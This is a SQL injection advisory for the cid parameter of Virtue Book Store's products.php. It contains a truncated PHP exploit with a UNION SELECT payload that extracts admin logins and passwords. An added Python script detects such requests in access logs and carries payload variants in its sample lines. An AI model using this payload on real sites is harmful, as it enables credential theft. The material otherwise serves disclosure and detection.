SQL injection vulnerability in products.php in Virtue Book Store allows remote malicious users to execute arbitrary SQL commands via the cid parameter.
CMS : Online Book Store
WEB : www.virtuenetz.com/book/
File : products.php
Variable type : GET
Value : cid
Type : SQL Injection
URL : www.site.com/products.php?cid=[SQLI]
Exploit :
<?
$web = $argv[1];
$url = $web."products.php?cid=8+and+1=0+union+select+all+concat(0x756E646572,id,0x3A,login,0x3A,password,0x736563)+from+admin+ ...
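
Added example (not part of the original advisory and not the vendor's code): a Python check that scans web server access logs for requests to products.php whose cid value is not a plain integer, which is how the UNION payload above shows up in a log. The log lines are constructed, and the assumption that legitimate cid values are numeric ids is inferred from the cid=8 in the request above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /book/products.php?cid=8 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /book/products.php?cid=8+and+1=0+union+select+all+concat(0x41,id)+from+admin HTTP/1.1" 200 734
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /book/products.php?cid=8%20UNION%20SELECT%201 HTTP/1.1" 200 512
198.51.100.2 - - [01/Jan/2024:10:01:00 +0000] "GET /book/index.php HTTP/1.1" 200 2048
"""

# Client address and request target from a common/combined log format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate cid is a short decimal category id.
VALID_CID = re.compile(r"[0-9]{1,10}")


def suspicious_cid_requests(log_text, script="products.php"):
    """Return (client, decoded_cid) for every request to `script` whose
    cid parameter is anything other than a plain integer."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/" + script):
            continue
        # parse_qs decodes both %xx and '+' so encoded variants compare equal.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("cid", []):
            if not VALID_CID.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_cid_requests(SAMPLE_LOG):
        print(f"{client}\tcid={value!r}")
```

The same allow-list rule (cid must match a short run of digits) is the input check to enforce in front of the query itself, alongside a parameterized statement.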